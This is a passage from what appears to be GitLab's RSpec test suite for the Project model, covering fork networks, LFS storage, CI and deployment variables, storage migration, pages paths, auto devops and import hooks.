it 'includes a fork of a fork' do
other_fork = fork_project(forked_project)
expect(project.fork_network.projects).to include(other_fork)
end
it 'includes sibling forks' do
other_fork = fork_project(project)
expect(forked_project.fork_network.projects).to include(other_fork)
end
it 'includes the base project' do
expect(forked_project.fork_network.projects).to include(project.reload)
end
end
describe '#in_fork_network_of?' do
it 'is true for a real fork' do
expect(forked_project.in_fork_network_of?(project)).to be_truthy
end
it 'is true for a fork of a fork', :postgresql do
other_fork = fork_project(forked_project)
expect(other_fork.in_fork_network_of?(project)).to be_truthy
end
it 'is true for sibling forks' do
sibling = fork_project(project)
expect(sibling.in_fork_network_of?(forked_project)).to be_truthy
end
it 'is false when another project is given' do
other_project = build_stubbed(:project)
expect(forked_project.in_fork_network_of?(other_project)).to be_falsy
end
end
describe '#fork_source' do
let!(:second_fork) { fork_project(forked_project) }
it 'returns the direct source if it exists' do
expect(second_fork.fork_source).to eq(forked_project)
end
it 'returns the root of the fork network when the directs source was deleted' do
forked_project.destroy
expect(second_fork.fork_source).to eq(project)
end
it 'returns nil if it is the root of the fork network' do
expect(project.fork_source).to be_nil
end
end
describe '#lfs_storage_project' do
it 'returns self for non-forks' do
expect(project.lfs_storage_project).to eq project
end
it 'returns the fork network root for forks' do
second_fork = fork_project(forked_project)
expect(second_fork.lfs_storage_project).to eq project
end
it 'returns self when fork_source is nil' do
expect(forked_project).to receive(:fork_source).and_return(nil)
expect(forked_project.lfs_storage_project).to eq forked_project
end
end
describe '#all_lfs_objects' do
let(:lfs_object) { create(:lfs_object) }
before do
project.lfs_objects << lfs_object
end
it 'returns the lfs object for a project' do
expect(project.all_lfs_objects).to contain_exactly(lfs_object)
end
it 'returns the lfs object for a fork' do
expect(forked_project.all_lfs_objects).to contain_exactly(lfs_object)
end
end
end
describe '#pushes_since_gc' do
let(:project) { create(:project) }
after do
project.reset_pushes_since_gc
end
context 'without any pushes' do
it 'returns 0' do
expect(project.pushes_since_gc).to eq(0)
end
end
context 'with a number of pushes' do
it 'returns the number of pushes' do
3.times { project.increment_pushes_since_gc }
expect(project.pushes_since_gc).to eq(3)
end
end
end
describe '#increment_pushes_since_gc' do
let(:project) { create(:project) }
after do
project.reset_pushes_since_gc
end
it 'increments the number of pushes since the last GC' do
3.times { project.increment_pushes_since_gc }
expect(project.pushes_since_gc).to eq(3)
end
end
describe '#repository_and_lfs_size' do
let(:project) { create(:project, :repository) }
let(:size) { 50 }
before do
allow(project.statistics).to receive(:total_repository_size).and_return(size)
end
it 'returns the total repository and lfs size' do
expect(project.repository_and_lfs_size).to eq(size)
end
end
describe '#approver_group_ids=' do
let(:project) { create(:project) }
it 'create approver_groups' do
group = create :group
group1 = create :group
project = create :project
project.approver_group_ids = "#{group.id}, #{group1.id}"
project.save!
expect(project.approver_groups.map(&:group)).to match_array([group, group1])
end
end
describe '#reset_pushes_since_gc' do
let(:project) { create(:project) }
after do
project.reset_pushes_since_gc
end
it 'resets the number of pushes since the last GC' do
3.times { project.increment_pushes_since_gc }
project.reset_pushes_since_gc
expect(project.pushes_since_gc).to eq(0)
end
end
describe '#deployment_variables' do
context 'when project has no deployment service' do
let(:project) { create(:project) }
it 'returns an empty array' do
expect(project.deployment_variables).to eq []
end
end
context 'when project has a deployment service' do
shared_examples 'same behavior between KubernetesService and Platform::Kubernetes' do
it 'returns variables from this service' do
expect(project.deployment_variables).to include(
{ key: 'KUBE_TOKEN', value: project.deployment_platform.token, public: false }
)
end
end
context 'when user configured kubernetes from Integration > Kubernetes' do
let(:project) { create(:kubernetes_project) }
it_behaves_like 'same behavior between KubernetesService and Platform::Kubernetes'
end
context 'when user configured kubernetes from CI/CD > Clusters' do
let!(:cluster) { create(:cluster, :project, :provided_by_gcp) }
let(:project) { cluster.project }
it_behaves_like 'same behavior between KubernetesService and Platform::Kubernetes'
end
context 'when multiple clusters (EEP) is enabled' do
before do
stub_licensed_features(multiple_clusters: true)
end
let(:project) { create(:project) }
let!(:default_cluster) do
create(:cluster,
platform_type: :kubernetes,
projects: [project],
environment_scope: '*',
platform_kubernetes: default_cluster_kubernetes)
end
let!(:review_env_cluster) do
create(:cluster,
platform_type: :kubernetes,
projects: [project],
environment_scope: 'review/*',
platform_kubernetes: review_env_cluster_kubernetes)
end
let(:default_cluster_kubernetes) { create(:cluster_platform_kubernetes, token: 'default-AAA') }
let(:review_env_cluster_kubernetes) { create(:cluster_platform_kubernetes, token: 'review-AAA') }
context 'when environment name is review/name' do
let!(:environment) { create(:environment, project: project, name: 'review/name') }
it 'returns variables from this service' do
expect(project.deployment_variables(environment: 'review/name'))
.to include(key: 'KUBE_TOKEN', value: 'review-AAA', public: false)
end
end
context 'when environment name is other' do
let!(:environment) { create(:environment, project: project, name: 'staging/name') }
it 'returns variables from this service' do
expect(project.deployment_variables(environment: 'staging/name'))
.to include(key: 'KUBE_TOKEN', value: 'default-AAA', public: false)
end
end
end
end
end
describe '#secret_variables_for' do
let(:project) { create(:project) }
let!(:secret_variable) do
create(:ci_variable, value: 'secret', project: project)
end
let!(:protected_variable) do
create(:ci_variable, :protected, value: 'protected', project: project)
end
subject { project.reload.secret_variables_for(ref: 'ref') }
before do
stub_application_setting(
default_branch_protection: Gitlab::Access::PROTECTION_NONE)
end
shared_examples 'ref is protected' do
it 'contains all the variables' do
is_expected.to contain_exactly(secret_variable, protected_variable)
end
end
context 'when the ref is not protected' do
it 'contains only the secret variables' do
is_expected.to contain_exactly(secret_variable)
end
end
context 'when the ref is a protected branch' do
before do
allow(project).to receive(:protected_for?).with('ref').and_return(true)
end
it_behaves_like 'ref is protected'
end
context 'when the ref is a protected tag' do
before do
allow(project).to receive(:protected_for?).with('ref').and_return(true)
end
it_behaves_like 'ref is protected'
end
end
describe '#protected_for?' do
let(:project) { create(:project) }
subject { project.protected_for?('ref') }
context 'when the ref is not protected' do
before do
stub_application_setting(
default_branch_protection: Gitlab::Access::PROTECTION_NONE)
end
it 'returns false' do
is_expected.to be_falsey
end
end
context 'when the ref is a protected branch' do
before do
allow(project).to receive(:repository).and_call_original
allow(project).to receive_message_chain(:repository, :branch_exists?).and_return(true)
create(:protected_branch, name: 'ref', project: project)
end
it 'returns true' do
is_expected.to be_truthy
end
end
context 'when the ref is a protected tag' do
before do
allow(project).to receive_message_chain(:repository, :branch_exists?).and_return(false)
allow(project).to receive_message_chain(:repository, :tag_exists?).and_return(true)
create(:protected_tag, name: 'ref', project: project)
end
it 'returns true' do
is_expected.to be_truthy
end
end
end
describe '#update_project_statistics' do
let(:project) { create(:project) }
it "is called after creation" do
expect(project.statistics).to be_a ProjectStatistics
expect(project.statistics).to be_persisted
end
it "copies the namespace_id" do
expect(project.statistics.namespace_id).to eq project.namespace_id
end
it "updates the namespace_id when changed" do
namespace = create(:namespace)
project.update(namespace: namespace)
expect(project.statistics.namespace_id).to eq namespace.id
end
end
describe '#create_import_state' do
it 'it is called after save' do
project = create(:project)
expect(project).to receive(:create_import_state)
project.update(mirror: true, mirror_user: project.owner, import_url: 'http://foo.com')
end
end
describe 'inside_path' do
let!(:project1) { create(:project, namespace: create(:namespace, path: 'name_pace')) }
let!(:project2) { create(:project) }
let!(:project3) { create(:project, namespace: create(:namespace, path: 'namespace')) }
let!(:path) { project1.namespace.full_path }
it 'returns correct project' do
expect(described_class.inside_path(path)).to eq([project1])
end
end
describe '#route_map_for' do
let(:project) { create(:project, :repository) }
let(:route_map) do
<<-MAP.strip_heredoc
- source: /source/(.*)/
public: '\\1'
MAP
end
before do
project.repository.create_file(User.last, '.gitlab/route-map.yml', route_map, message: 'Add .gitlab/route-map.yml', branch_name: 'master')
end
context 'when there is a .gitlab/route-map.yml at the commit' do
context 'when the route map is valid' do
it 'returns a route map' do
map = project.route_map_for(project.commit.sha)
expect(map).to be_a_kind_of(Gitlab::RouteMap)
end
end
context 'when the route map is invalid' do
let(:route_map) { 'INVALID' }
it 'returns nil' do
expect(project.route_map_for(project.commit.sha)).to be_nil
end
end
end
context 'when there is no .gitlab/route-map.yml at the commit' do
it 'returns nil' do
expect(project.route_map_for(project.commit.parent.sha)).to be_nil
end
end
end
describe '#public_path_for_source_path' do
let(:project) { create(:project, :repository) }
let(:route_map) do
Gitlab::RouteMap.new(<<-MAP.strip_heredoc)
- source: /source/(.*)/
public: '\\1'
MAP
end
let(:sha) { project.commit.id }
context 'when there is a route map' do
before do
allow(project).to receive(:route_map_for).with(sha).and_return(route_map)
end
context 'when the source path is mapped' do
it 'returns the public path' do
expect(project.public_path_for_source_path('source/file.html', sha)).to eq('file.html')
end
end
context 'when the source path is not mapped' do
it 'returns nil' do
expect(project.public_path_for_source_path('file.html', sha)).to be_nil
end
end
end
context 'when there is no route map' do
before do
allow(project).to receive(:route_map_for).with(sha).and_return(nil)
end
it 'returns nil' do
expect(project.public_path_for_source_path('source/file.html', sha)).to be_nil
end
end
end
describe '#parent' do
let(:project) { create(:project) }
it { expect(project.parent).to eq(project.namespace) }
end
describe '#parent_id' do
let(:project) { create(:project) }
it { expect(project.parent_id).to eq(project.namespace_id) }
end
describe '#parent_changed?' do
let(:project) { create(:project) }
before do
project.namespace_id = 7
end
it { expect(project.parent_changed?).to be_truthy }
end
def enable_lfs
allow(Gitlab.config.lfs).to receive(:enabled).and_return(true)
end
describe '#pages_url' do
let(:group) { create(:group, name: 'Group') }
let(:nested_group) { create(:group, parent: group) }
let(:domain) { 'Example.com' }
subject { project.pages_url }
before do
allow(Settings.pages).to receive(:host).and_return(domain)
allow(Gitlab.config.pages).to receive(:url).and_return('http://example.com')
end
context 'top-level group' do
let(:project) { create(:project, namespace: group, name: project_name) }
context 'group page' do
let(:project_name) { 'group.example.com' }
it { is_expected.to eq("http://group.example.com") }
end
context 'project page' do
let(:project_name) { 'Project' }
it { is_expected.to eq("http://group.example.com/project") }
end
end
context 'nested group' do
let(:project) { create(:project, namespace: nested_group, name: project_name) }
let(:expected_url) { "http://group.example.com/#{nested_group.path}/#{project.path}" }
context 'group page' do
let(:project_name) { 'group.example.com' }
it { is_expected.to eq(expected_url) }
end
context 'project page' do
let(:project_name) { 'Project' }
it { is_expected.to eq(expected_url) }
end
end
end
describe '#http_url_to_repo' do
let(:project) { create(:project) }
it 'returns the url to the repo without a username' do
expect(project.http_url_to_repo).to eq("#{project.web_url}.git")
expect(project.http_url_to_repo).not_to include('@')
end
end
describe '#pipeline_status' do
let(:project) { create(:project, :repository) }
it 'builds a pipeline status' do
expect(project.pipeline_status).to be_a(Gitlab::Cache::Ci::ProjectPipelineStatus)
end
it 'hase a loaded pipeline status' do
expect(project.pipeline_status).to be_loaded
end
end
describe '#append_or_update_attribute' do
let(:project) { create(:project) }
it 'shows full error updating an invalid MR' do
error_message = 'Failed to replace merge_requests because one or more of the new records could not be saved.'\
' Validate fork Source project is not a fork of the target project'
expect { project.append_or_update_attribute(:merge_requests, [create(:merge_request)]) }
.to raise_error(ActiveRecord::RecordNotSaved, error_message)
end
it 'updates the project succesfully' do
merge_request = create(:merge_request, target_project: project, source_project: project)
expect { project.append_or_update_attribute(:merge_requests, [merge_request]) }
.not_to raise_error
end
end
describe '#last_repository_updated_at' do
it 'sets to created_at upon creation' do
project = create(:project, created_at: 2.hours.ago)
expect(project.last_repository_updated_at.to_i).to eq(project.created_at.to_i)
end
end
describe '.public_or_visible_to_user' do
let!(:user) { create(:user) }
let!(:private_project) do
create(:project, :private, creator: user, namespace: user.namespace)
end
let!(:public_project) { create(:project, :public) }
context 'with a user' do
let(:projects) do
described_class.all.public_or_visible_to_user(user)
end
it 'includes projects the user has access to' do
expect(projects).to include(private_project)
end
it 'includes projects the user can see' do
expect(projects).to include(public_project)
end
end
context 'without a user' do
it 'only includes public projects' do
projects = described_class.all.public_or_visible_to_user
expect(projects).to eq([public_project])
end
end
end
describe '#pages_available?' do
let(:project) { create(:project, group: group) }
subject { project.pages_available? }
before do
allow(Gitlab.config.pages).to receive(:enabled).and_return(true)
end
context 'when the project is in a top level namespace' do
let(:group) { create(:group) }
it { is_expected.to be(true) }
end
context 'when the project is in a subgroup' do
let(:group) { create(:group, :nested) }
it { is_expected.to be(false) }
end
end
describe '#remove_private_deploy_keys' do
let!(:project) { create(:project) }
context 'for a private deploy key' do
let!(:key) { create(:deploy_key, public: false) }
let!(:deploy_keys_project) { create(:deploy_keys_project, deploy_key: key, project: project) }
context 'when the key is not linked to another project' do
it 'removes the key' do
project.remove_private_deploy_keys
expect(project.deploy_keys).not_to include(key)
end
end
context 'when the key is linked to another project' do
before do
another_project = create(:project)
create(:deploy_keys_project, deploy_key: key, project: another_project)
end
it 'does not remove the key' do
project.remove_private_deploy_keys
expect(project.deploy_keys).to include(key)
end
end
end
context 'for a public deploy key' do
let!(:key) { create(:deploy_key, public: true) }
let!(:deploy_keys_project) { create(:deploy_keys_project, deploy_key: key, project: project) }
it 'does not remove the key' do
project.remove_private_deploy_keys
expect(project.deploy_keys).to include(key)
end
end
end
describe '#remove_pages' do
let(:project) { create(:project) }
let(:namespace) { project.namespace }
let(:pages_path) { project.pages_path }
around do |example|
FileUtils.mkdir_p(pages_path)
begin
example.run
ensure
FileUtils.rm_rf(pages_path)
end
end
it 'removes the pages directory' do
expect_any_instance_of(Projects::UpdatePagesConfigurationService).to receive(:execute)
expect_any_instance_of(Gitlab::PagesTransfer).to receive(:rename_project).and_return(true)
expect(PagesWorker).to receive(:perform_in).with(5.minutes, :remove, namespace.full_path, anything)
project.remove_pages
end
it 'is a no-op when there is no namespace' do
project.namespace.delete
project.reload
expect_any_instance_of(Projects::UpdatePagesConfigurationService).not_to receive(:execute)
expect_any_instance_of(Gitlab::PagesTransfer).not_to receive(:rename_project)
project.remove_pages
end
it 'is run when the project is destroyed' do
expect(project).to receive(:remove_pages).and_call_original
project.destroy
end
end
describe '#remove_export' do
let(:legacy_project) { create(:project, :legacy_storage, :with_export) }
let(:project) { create(:project, :with_export) }
it 'removes the exports directory for the project' do
expect(File.exist?(project.export_path)).to be_truthy
allow(FileUtils).to receive(:rm_rf).and_call_original
expect(FileUtils).to receive(:rm_rf).with(project.export_path).and_call_original
project.remove_exports
expect(File.exist?(project.export_path)).to be_falsy
end
it 'is a no-op on legacy projects when there is no namespace' do
export_path = legacy_project.export_path
legacy_project.namespace.delete
legacy_project.reload
expect(FileUtils).not_to receive(:rm_rf).with(export_path)
legacy_project.remove_exports
expect(File.exist?(export_path)).to be_truthy
end
it 'runs on hashed storage projects when there is no namespace' do
export_path = project.export_path
project.namespace.delete
legacy_project.reload
allow(FileUtils).to receive(:rm_rf).and_call_original
expect(FileUtils).to receive(:rm_rf).with(export_path).and_call_original
project.remove_exports
expect(File.exist?(export_path)).to be_falsy
end
it 'is run when the project is destroyed' do
expect(project).to receive(:remove_exports).and_call_original
project.destroy
end
end
describe '#remove_exported_project_file' do
let(:project) { create(:project, :with_export) }
it 'removes the exported project file' do
exported_file = project.export_project_path
expect(File.exist?(exported_file)).to be_truthy
allow(FileUtils).to receive(:rm_f).and_call_original
expect(FileUtils).to receive(:rm_f).with(exported_file).and_call_original
project.remove_exported_project_file
expect(File.exist?(exported_file)).to be_falsy
end
end
describe '#forks_count' do
it 'returns the number of forks' do
project = build(:project)
expect_any_instance_of(Projects::ForksCountService).to receive(:count).and_return(1)
expect(project.forks_count).to eq(1)
end
end
context 'legacy storage' do
let(:project) { create(:project, :repository, :legacy_storage) }
let(:gitlab_shell) { Gitlab::Shell.new }
let(:project_storage) { project.send(:storage) }
before do
allow(project).to receive(:gitlab_shell).and_return(gitlab_shell)
end
describe '#base_dir' do
it 'returns base_dir based on namespace only' do
expect(project.base_dir).to eq(project.namespace.full_path)
end
end
describe '#disk_path' do
it 'returns disk_path based on namespace and project path' do
expect(project.disk_path).to eq("#{project.namespace.full_path}/#{project.path}")
end
end
describe '#ensure_storage_path_exists' do
it 'delegates to gitlab_shell to ensure namespace is created' do
expect(gitlab_shell).to receive(:add_namespace).with(project.repository_storage, project.base_dir)
project.ensure_storage_path_exists
end
end
describe '#legacy_storage?' do
it 'returns true when storage_version is nil' do
project = build(:project, storage_version: nil)
expect(project.legacy_storage?).to be_truthy
end
it 'returns true when the storage_version is 0' do
project = build(:project, storage_version: 0)
expect(project.legacy_storage?).to be_truthy
end
end
describe '#hashed_storage?' do
it 'returns false' do
expect(project.hashed_storage?(:repository)).to be_falsey
end
end
describe '#rename_repo' do
before do
# Project#gitlab_shell returns a new instance of Gitlab::Shell on every
# call. This makes testing a bit easier.
allow(project).to receive(:gitlab_shell).and_return(gitlab_shell)
allow(project).to receive(:previous_changes).and_return('path' => ['foo'])
end
it 'renames a repository' do
stub_container_registry_config(enabled: false)
expect(gitlab_shell).to receive(:mv_repository)
.ordered
.with(project.repository_storage, "#{project.namespace.full_path}/foo", "#{project.full_path}")
.and_return(true)
expect(gitlab_shell).to receive(:mv_repository)
.ordered
.with(project.repository_storage, "#{project.namespace.full_path}/foo.wiki", "#{project.full_path}.wiki")
.and_return(true)
expect_any_instance_of(SystemHooksService)
.to receive(:execute_hooks_for)
.with(project, :rename)
expect_any_instance_of(Gitlab::UploadsTransfer)
.to receive(:rename_project)
.with('foo', project.path, project.namespace.full_path)
expect(project).to receive(:expire_caches_before_rename)
expect(project).to receive(:expires_full_path_cache)
project.rename_repo
end
context 'container registry with images' do
let(:container_repository) { create(:container_repository) }
before do
stub_container_registry_config(enabled: true)
stub_container_registry_tags(repository: :any, tags: ['tag'])
project.container_repositories << container_repository
end
subject { project.rename_repo }
it { expect { subject }.to raise_error(StandardError) }
end
context 'gitlab pages' do
before do
expect(project_storage).to receive(:rename_repo) { true }
end
it 'moves pages folder to new location' do
expect_any_instance_of(Gitlab::PagesTransfer).to receive(:rename_project)
project.rename_repo
end
end
context 'attachments' do
before do
expect(project_storage).to receive(:rename_repo) { true }
end
it 'moves uploads folder to new location' do
expect_any_instance_of(Gitlab::UploadsTransfer).to receive(:rename_project)
project.rename_repo
end
end
it 'updates project full path in .git/config' do
allow(project_storage).to receive(:rename_repo).and_return(true)
project.rename_repo
expect(project.repository.rugged.config['gitlab.fullpath']).to eq(project.full_path)
end
end
describe '#pages_path' do
it 'returns a path where pages are stored' do
expect(project.pages_path).to eq(File.join(Settings.pages.path, project.namespace.full_path, project.path))
end
end
describe '#migrate_to_hashed_storage!' do
it 'returns true' do
expect(project.migrate_to_hashed_storage!).to be_truthy
end
it 'flags as read-only' do
expect { project.migrate_to_hashed_storage! }.to change { project.repository_read_only }.to(true)
end
it 'schedules ProjectMigrateHashedStorageWorker with delayed start when the project repo is in use' do
Gitlab::ReferenceCounter.new(project.gl_repository(is_wiki: false)).increase
expect(ProjectMigrateHashedStorageWorker).to receive(:perform_in)
project.migrate_to_hashed_storage!
end
it 'schedules ProjectMigrateHashedStorageWorker with delayed start when the wiki repo is in use' do
Gitlab::ReferenceCounter.new(project.gl_repository(is_wiki: true)).increase
expect(ProjectMigrateHashedStorageWorker).to receive(:perform_in)
project.migrate_to_hashed_storage!
end
it 'schedules ProjectMigrateHashedStorageWorker' do
expect(ProjectMigrateHashedStorageWorker).to receive(:perform_async).with(project.id)
project.migrate_to_hashed_storage!
end
end
end
context 'hashed storage' do
let(:project) { create(:project, :repository, skip_disk_validation: true) }
let(:gitlab_shell) { Gitlab::Shell.new }
let(:hash) { Digest::SHA2.hexdigest(project.id.to_s) }
let(:hashed_prefix) { File.join('@hashed', hash[0..1], hash[2..3]) }
let(:hashed_path) { File.join(hashed_prefix, hash) }
before do
stub_application_setting(hashed_storage_enabled: true)
end
describe '#legacy_storage?' do
it 'returns false' do
expect(project.legacy_storage?).to be_falsey
end
end
describe '#hashed_storage?' do
it 'returns true if rolled out' do
expect(project.hashed_storage?(:attachments)).to be_truthy
end
it 'returns false when not rolled out yet' do
project.storage_version = 1
expect(project.hashed_storage?(:attachments)).to be_falsey
end
end
describe '#base_dir' do
it 'returns base_dir based on hash of project id' do
expect(project.base_dir).to eq(hashed_prefix)
end
end
describe '#disk_path' do
it 'returns disk_path based on hash of project id' do
expect(project.disk_path).to eq(hashed_path)
end
end
describe '#ensure_storage_path_exists' do
it 'delegates to gitlab_shell to ensure namespace is created' do
allow(project).to receive(:gitlab_shell).and_return(gitlab_shell)
expect(gitlab_shell).to receive(:add_namespace).with(project.repository_storage, hashed_prefix)
project.ensure_storage_path_exists
end
end
describe '#rename_repo' do
before do
# Project#gitlab_shell returns a new instance of Gitlab::Shell on every
# call. This makes testing a bit easier.
allow(project).to receive(:gitlab_shell).and_return(gitlab_shell)
allow(project).to receive(:previous_changes).and_return('path' => ['foo'])
end
it 'renames a repository' do
stub_container_registry_config(enabled: false)
expect(gitlab_shell).not_to receive(:mv_repository)
expect_any_instance_of(SystemHooksService)
.to receive(:execute_hooks_for)
.with(project, :rename)
expect(project).to receive(:expire_caches_before_rename)
expect(project).to receive(:expires_full_path_cache)
project.rename_repo
end
context 'container registry with images' do
let(:container_repository) { create(:container_repository) }
before do
stub_container_registry_config(enabled: true)
stub_container_registry_tags(repository: :any, tags: ['tag'])
project.container_repositories << container_repository
end
subject { project.rename_repo }
it { expect { subject }.to raise_error(StandardError) }
end
context 'gitlab pages' do
it 'moves pages folder to new location' do
expect_any_instance_of(Gitlab::PagesTransfer).to receive(:rename_project)
project.rename_repo
end
end
context 'attachments' do
it 'keeps uploads folder location unchanged' do
expect_any_instance_of(Gitlab::UploadsTransfer).not_to receive(:rename_project)
project.rename_repo
end
context 'when not rolled out' do
let(:project) { create(:project, :repository, storage_version: 1, skip_disk_validation: true) }
it 'moves pages folder to new location' do
expect_any_instance_of(Gitlab::UploadsTransfer).to receive(:rename_project)
project.rename_repo
end
end
end
it 'updates project full path in .git/config' do
project.rename_repo
expect(project.repository.rugged.config['gitlab.fullpath']).to eq(project.full_path)
end
end
describe '#pages_path' do
it 'returns a path where pages are stored' do
expect(project.pages_path).to eq(File.join(Settings.pages.path, project.namespace.full_path, project.path))
end
end
describe '#migrate_to_hashed_storage!' do
it 'returns nil' do
expect(project.migrate_to_hashed_storage!).to be_nil
end
it 'does not flag as read-only' do
expect { project.migrate_to_hashed_storage! }.not_to change { project.repository_read_only }
end
end
end
describe '#gl_repository' do
let(:project) { create(:project) }
it 'delegates to Gitlab::GlRepository.gl_repository' do
expect(Gitlab::GlRepository).to receive(:gl_repository).with(project, true)
project.gl_repository(is_wiki: true)
end
end
describe '#has_ci?' do
set(:project) { create(:project) }
let(:repository) { double }
before do
expect(project).to receive(:repository) { repository }
end
context 'when has .gitlab-ci.yml' do
before do
expect(repository).to receive(:gitlab_ci_yml) { 'content' }
end
it "CI is available" do
expect(project).to have_ci
end
end
context 'when there is no .gitlab-ci.yml' do
before do
expect(repository).to receive(:gitlab_ci_yml) { nil }
end
it "CI is not available" do
expect(project).not_to have_ci
end
context 'when auto devops is enabled' do
before do
stub_application_setting(auto_devops_enabled: true)
end
it "CI is available" do
expect(project).to have_ci
end
end
end
end
describe '#auto_devops_enabled?' do
set(:project) { create(:project) }
subject { project.auto_devops_enabled? }
context 'when enabled in settings' do
before do
stub_application_setting(auto_devops_enabled: true)
end
it 'auto devops is implicitly enabled' do
expect(project.auto_devops).to be_nil
expect(project).to be_auto_devops_enabled
end
context 'when explicitly enabled' do
before do
create(:project_auto_devops, project: project)
end
it "auto devops is enabled" do
expect(project).to be_auto_devops_enabled
end
end
context 'when explicitly disabled' do
before do
create(:project_auto_devops, project: project, enabled: false)
end
it "auto devops is disabled" do
expect(project).not_to be_auto_devops_enabled
end
end
end
context 'when disabled in settings' do
before do
stub_application_setting(auto_devops_enabled: false)
end
it 'auto devops is implicitly disabled' do
expect(project.auto_devops).to be_nil
expect(project).not_to be_auto_devops_enabled
end
context 'when explicitly enabled' do
before do
create(:project_auto_devops, project: project)
end
it "auto devops is enabled" do
expect(project).to be_auto_devops_enabled
end
end
end
end
describe '#has_auto_devops_implicitly_disabled?' do
set(:project) { create(:project) }
context 'when enabled in settings' do
before do
stub_application_setting(auto_devops_enabled: true)
end
it 'does not have auto devops implicitly disabled' do
expect(project).not_to have_auto_devops_implicitly_disabled
end
end
context 'when disabled in settings' do
before do
stub_application_setting(auto_devops_enabled: false)
end
it 'auto devops is implicitly disabled' do
expect(project).to have_auto_devops_implicitly_disabled
end
context 'when explicitly disabled' do
before do
create(:project_auto_devops, project: project, enabled: false)
end
it 'does not have auto devops implicitly disabled' do
expect(project).not_to have_auto_devops_implicitly_disabled
end
end
context 'when explicitly enabled' do
before do
create(:project_auto_devops, project: project)
end
it 'does not have auto devops implicitly disabled' do
expect(project).not_to have_auto_devops_implicitly_disabled
end
end
end
end
context '#auto_devops_variables' do
set(:project) { create(:project) }
subject { project.auto_devops_variables }
context 'when enabled in instance settings' do
before do
stub_application_setting(auto_devops_enabled: true)
end
context 'when domain is empty' do
before do
stub_application_setting(auto_devops_domain: nil)
end
it 'variables does not include AUTO_DEVOPS_DOMAIN' do
is_expected.not_to include(domain_variable)
end
end
context 'when domain is configured' do
before do
stub_application_setting(auto_devops_domain: 'example.com')
end
it 'variables includes AUTO_DEVOPS_DOMAIN' do
is_expected.to include(domain_variable)
end
end
end
context 'when explicitely enabled' do
context 'when domain is empty' do
before do
create(:project_auto_devops, project: project, domain: nil)
end
it 'variables does not include AUTO_DEVOPS_DOMAIN' do
is_expected.not_to include(domain_variable)
end
end
context 'when domain is configured' do
before do
create(:project_auto_devops, project: project, domain: 'example.com')
end
it 'variables includes AUTO_DEVOPS_DOMAIN' do
is_expected.to include(domain_variable)
end
end
end
def domain_variable
{ key: 'AUTO_DEVOPS_DOMAIN', value: 'example.com', public: true }
end
end
describe '#latest_successful_builds_for' do
let(:project) { build(:project) }
before do
allow(project).to receive(:default_branch).and_return('master')
end
context 'without a ref' do
it 'returns a pipeline for the default branch' do
expect(project)
.to receive(:latest_successful_pipeline_for_default_branch)
project.latest_successful_pipeline_for
end
end
context 'with the ref set to the default branch' do
it 'returns a pipeline for the default branch' do
expect(project)
.to receive(:latest_successful_pipeline_for_default_branch)
project.latest_successful_pipeline_for(project.default_branch)
end
end
context 'with a ref that is not the default branch' do
it 'returns the latest successful pipeline for the given ref' do
expect(project.pipelines).to receive(:latest_successful_for).with('foo')
project.latest_successful_pipeline_for('foo')
end
end
end
describe '#check_repository_path_availability' do
let(:project) { build(:project) }
it 'skips gitlab-shell exists?' do
project.skip_disk_validation = true
expect(project.gitlab_shell).not_to receive(:exists?)
expect(project.check_repository_path_availability).to be_truthy
end
end
describe '#latest_successful_pipeline_for_default_branch' do
let(:project) { build(:project) }
before do
allow(project).to receive(:default_branch).and_return('master')
end
it 'memoizes and returns the latest successful pipeline for the default branch' do
pipeline = double(:pipeline)
expect(project.pipelines).to receive(:latest_successful_for)
.with(project.default_branch)
.and_return(pipeline)
.once
2.times do
expect(project.latest_successful_pipeline_for_default_branch)
.to eq(pipeline)
end
end
end
describe '#after_import' do
let(:project) { build(:project) }
it 'runs the correct hooks' do
expect(project.repository).to receive(:after_import)
expect(project).to receive(:import_finish)
expect(project).to receive(:update_project_counter_caches)
expect(project).to receive(:remove_import_jid)
expect(project).to receive(:after_create_default_branch)
expect(project).to receive(:refresh_markdown_cache!)
project.after_import
end
context 'branch protection' do
let(:project) { create(:project, :repository, :import_started) }
it 'does not protect when branch protection is disabled' do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_NONE)
project.after_import
expect(project.protected_branches).to be_empty
end
it "gives developer access to push when branch protection is set to 'developers can push'" do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_DEV_CAN_PUSH)
project.after_import
expect(project.protected_branches).not_to be_empty
expect(project.default_branch).to eq(project.protected_branches.first.name)
expect(project.protected_branches.first.push_access_levels.map(&:access_level)).to eq([Gitlab::Access::DEVELOPER])
end
it "gives developer access to merge when branch protection is set to 'developers can merge'" do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_DEV_CAN_MERGE)
project.after_import
expect(project.protected_branches).not_to be_empty
expect(project.default_branch).to eq(project.protected_branches.first.name)
expect(project.protected_branches.first.merge_access_levels.map(&:access_level)).to eq([Gitlab::Access::DEVELOPER])
end
it 'protects default branch' do
project.after_import
expect(project.protected_branches).not_to be_empty
expect(project.default_branch).to eq(project.protected_branches.first.name)
expect(project.protected_branches.first.push_access_levels.map(&:access_level)).to eq([Gitlab::Access::MASTER])
expect(project.protected_branches.first.merge_access_levels.map(&:access_level)).to eq([Gitlab::Access::MASTER])
end
end
end
describe '#update_project_counter_caches' do
let(:project) { create(:project) }
it 'updates all project counter caches' do
expect_any_instance_of(Projects::OpenIssuesCountService)
.to receive(:refresh_cache)
.and_call_original
expect_any_instance_of(Projects::OpenMergeRequestsCountService)
.to receive(:refresh_cache)
.and_call_original
project.update_project_counter_caches
end
end
describe '#remove_import_jid', :clean_gitlab_redis_cache do
let(:project) { }
context 'without an import JID' do
it 'does nothing' do
project = create(:project)
expect(Gitlab::SidekiqStatus)
.not_to receive(:unset)
project.remove_import_jid
end
end
context 'with an import JID' do
it 'unsets the import JID' do
project = create(:project)
create(:import_state, project: project, jid: '123')
expect(Gitlab::SidekiqStatus)
.to receive(:unset)
.with('123')
.and_call_original
project.remove_import_jid
expect(project.import_jid).to be_nil
end
end
end
describe '#wiki_repository_exists?' do
it 'returns true when the wiki repository exists' do
project = create(:project, :wiki_repo)
expect(project.wiki_repository_exists?).to eq(true)
end
it 'returns false when the wiki repository does not exist' do
project = create(:project)
expect(project.wiki_repository_exists?).to eq(false)
end
end
describe '#root_namespace' do
let(:project) { build(:project, namespace: parent) }
subject { project.root_namespace }
context 'when namespace has parent group' do
let(:root_ancestor) { create(:group) }
let(:parent) { build(:group, parent: root_ancestor) }
it 'returns root ancestor' do
is_expected.to eq(root_ancestor)
end
end
context 'when namespace is root ancestor' do
let(:parent) { build(:group) }
